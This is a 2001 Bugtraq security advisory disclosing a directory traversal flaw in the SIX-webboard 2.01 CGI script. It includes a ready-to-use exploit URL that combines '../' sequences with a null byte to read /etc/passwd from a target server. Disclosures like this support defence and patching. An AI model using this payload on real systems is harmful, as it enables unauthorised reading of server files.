[22228] in bugtraq
SIX-webboard 2.01 "show files" vulnerability
daemon@ATHENA.MIT.EDU (Hannibal Lector)
Mon Aug 13 14:30:21 2001
Date: 13 Aug 2001 16:15:33 -0000
Message-ID: <20010813161533.23245.qmail@securityfocus.com>
From: Hannibal Lector <digitalseed@poizonb0x.org>
To: bugtraq@securityfocus.com
* a little bit late, but "it's better late than never"! *
--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------
-NAME:
SIX-webboard 2.01 "show files" vulnerability.
-DESCRIPTION:
Little, but very popular webboard coded by Pipo
(webmaster@sixhead.com).
Find more information about the SIX-webboard here:
http://www.sixhead.com
or http://www.sixhead.net.
-PROBLEM:
'..' and '/' are not filtered while processing user input,
so it is
possible to enter arbitrary values to retreive files from
remote sever,
which should not be accessible normally.
-EXPLOIT:
http://www.target.net/cgi-bin/webboard/generate.cgi
?content=../../../../../../../../../etc/passwd%
00&board=boardsname
!The above line if given will output the file contents
of /etc/passwd
-AUTHORs:
Discovery: digitalseed and k$en0r
Advisory: digitalseed
-DISCLAIMER:
PoizonB0x may not be held liable for the use or
potential
effects of these programs or advisories, nor the
content contained
within. Use them at your own risk.
-COPYRIGHT:
PoizonB0x Crew - www.poizonb0x.org (c) 2000-
2001
--------------[ PoizonB0x Advisory#1 pb0x-07-07-2001 ]-
---------------
